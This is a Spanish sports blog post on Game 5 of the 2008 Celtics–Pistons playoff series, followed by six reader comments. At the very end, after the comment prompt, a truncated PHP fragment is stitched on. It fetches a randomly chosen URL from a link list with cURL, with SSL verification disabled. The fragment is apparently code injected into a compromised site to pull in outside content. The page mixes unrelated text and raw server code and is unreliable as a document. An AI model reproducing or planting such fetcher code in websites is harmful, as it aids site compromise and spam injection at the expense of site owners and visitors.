Y Ray sacó su fusil (DET 102 – BOS 106)

29 de May de 2008 por TheDeerHunter

Partidazo en el TD Banknorth Garden de Boston y, como ya es tradicional este año, los Celtics toman ventaja en el quinto. Tiene toda la pinta que la volverán a perder en el sexto pero de momento ponen a Detroit contra las cuerdas y se aseguran el hipotético séptimo para otra vez definir en su plaza fuerte.

Anoche, además de la noticia de que fue un partido bonito, pudimos disfrutar además del verdadero nivel de Ray Allen. Si los Celtics logran recuperarlo precísamente ahora tendrán mucho ganado para cumplir su objetivo. Tiene mucho mérito lo que hizo el escolta. Para revertir una racha tan nefasta hace falta mucha fortaleza mental, más aún cuando te encuentras en una situación personal tan delicada como la suya. Para un tirador su nivel de autoestima y la calma son fundamentales y cada partido malo las ataca directamente, llegando el punto en el que uno entra en un circulo vicioso del que cada vez es más difícil salir. No sabemos si se trata de la flor de un día, pero anoche por fin tuvimos al exquisito francotirador que siempre ha sido. La tercera hoja del trébol.

Hay que ver cómo son las cosas, pues si la otra noche día McDyess nos sorprendió a todos con una actuación memorable, en esta ocasión fue Kedrick Perkins quien desplegó un nivel superlativo. Junto a un Garnett extraordinario en ataque se cumplieron sobrada venganza del castigo que les cayó en la zona el otro día. Con todo, incluso con una espectacular dirección de Rajon Rondo, los Celtics estuvieron a punto de dejarse remontar en el último momento una ventaja que llegó a ser hasta de 19 puntos y sólo un certero tiro postrero de Allen junto a ciertos fallos decisivos en los tiros libres evitó que se les escapara el partido.

Por parte de Detroit, la buena noticia fue el buen partido de Billups. Si es capaz de sobrellevar sus problemas los Pistons todavía tienen mucho que decir en esta eliminatoria. A él se le unió el buen partido del de siempre (Hamilton), un buen Stuckey y “raza blanca-tirador” Wallace, que anoche decidió que molaba más jugar a ser exterior puro. Por contra, jarro de agua fría para McDyess y preocupación por Tayshaun Prince, que está pasando las de Caín en esta serie contra Paul Pierce.

Ahora todo vuelve al Palace de Detroit. Pensamos que volverá a pasar igual y que el sábado podremos hacer “corta-pega” con todo lo que dijimos antes de los anteriores séptimos partidos en Boston. En sus manos está el evitarlo, pero vaya, parece que hasta le han cogido el gustillo…

Comenta

6 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Una serie larga y dura, un par de esguinces de grado 3 para los ganadores del 7º partido, y listo 😀

    En fin, todo apunta a victoria de los Celtics en el 7º. De nuevo.

      Citar

  2. xapa_croack dice:
    #2

    Preocupante el banquillo verde.

      Citar

  3. Gallis dice:
    #3

    Ufff, si vuelve Ray Allen (este es el momento para hacerlo) y Perkins juega a este nivel, son muy, muy favoritos…no sé, ayer ví a los Pistons muy cascados y, cosa muy rara, bastante descentrados…

    Ahora bien, si yo fuera de los Celtics, esperaría ganar el sexto (y creo que lo van a ganar), porque como se vayan a un séptimo, veo a los Pistons en la final…pero vamos, es hablar por no callar.

      Citar

  4. Viva_Dirk dice:
    #4

    Lo que deberia preocupar a los Celtics es que casi se les escapa el partido cuando fueron bastante superiores durante todo el encuentro.

    Gallis, si Perkins promedia 15-15, me hago de Miami, jeje.

      Citar

  5. Gallis dice:
    #5

    Ya, pero pensando en una hipotética final contra ellos, igual les basta si lo hace en un par de partidos…y Turiaf mediante, no lo veo tan improbable…

      Citar

  6. TheDeerHunter dice:
    #6

    Todos con Pistons para el 6º (que lo van a tener jodido con Hamilton arrastrando molestias)

    después ya que gane el que le rote…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>